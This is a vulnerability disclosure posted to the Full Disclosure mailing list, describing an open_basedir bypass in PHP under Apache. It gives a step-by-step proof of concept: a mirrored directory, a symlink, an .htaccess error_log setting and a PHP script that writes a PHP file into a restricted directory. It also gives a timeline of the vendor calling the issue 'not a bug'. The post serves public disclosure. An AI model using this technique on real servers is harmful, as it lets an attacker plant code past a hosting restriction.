Date: Wed, 16 Sep 2020 04:15:44 +0000
From: Havijoori via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Apache + PHP <= 7.4.10 open_basedir bypass

Introduction
============
open_basedir security feature can be bypassed when Apache web server runs PHP scripts.

Proof of Concept
================
1. Set open_basedir as a security feature in php.ini file :
   open_basedir = /var/www/html:/tmp
2. Make a directory with the name of your web server's home directory inside your web server's home directory :
   mkdir -p /var/www/html/var/www/html
3. Make a symlink to a restricted writable directory inside this new directory :
   ln -s /home/havijoori/www/uploads /var/www/html/var/www/html/test
4. Make a .htaccess file in your web server's root directory to set php value :
   php_value error_log "var/www/html/test/hacked.php"
5. Make a PHP script, "bypass.php" in your web server's root directory to exploit the vulnerability :
   <?php error_log("<?php phpinfo(); ?>"); ?>
6. Call the script :
   curl http://webserver/bypass.php
7. After successful exploitation, our file "hacked.php" should be created in the restricted directory :
   ls /home/havijoori/www/uploads/hacked.php

Tested with PHP 5.2.5 and 7.x.
Similar to CVE-2007-3378.

Timeline
========
2020-08-17 : Vendor notified (bug #79985)
2020-08-26 : Vendor changed the report's status to "Not a bug"
2020-09-03 : PHP 7.4.10 released without any patch
2020-09-16 : Public disclosure. Maybe the community can fix the bug!

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists